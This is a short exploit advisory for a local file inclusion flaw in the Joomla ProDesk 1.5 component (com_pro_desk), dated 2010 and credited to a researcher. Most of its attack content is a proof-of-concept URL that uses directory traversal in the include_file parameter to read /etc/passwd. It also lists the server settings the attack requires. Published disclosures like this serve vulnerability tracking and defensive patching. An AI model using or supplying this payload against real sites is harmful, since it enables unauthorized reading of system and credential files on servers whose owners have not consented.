Joomla Component ProDesk 1.5 - Local File Inclusion Vulnerability



[~]-------------------------------------------------------------------------------------------------------

[~] Joomla Component ProDesk v 1.5 (com_pro_desk&include_file) Local File Inclusion  
[~]
[~] http://joomlashowroom.com
[~]  
[~] Price - $ 49.99
[~] ----------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 7.11.2010
[~]
[~] http://security-sh3ll.blogspot.com | http://twitter.com/securityshell
[~]
[~] -----------------------------------------------------------------------------------------------------
[~] Poc :-
[~]
[~] http://site.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
[~]  
[~] Note :-
[~]
[~] Need: magic_quotes=OFF - Need: disable_functions=ini_set
[~]-------------------------------------------------------------------------------------------------------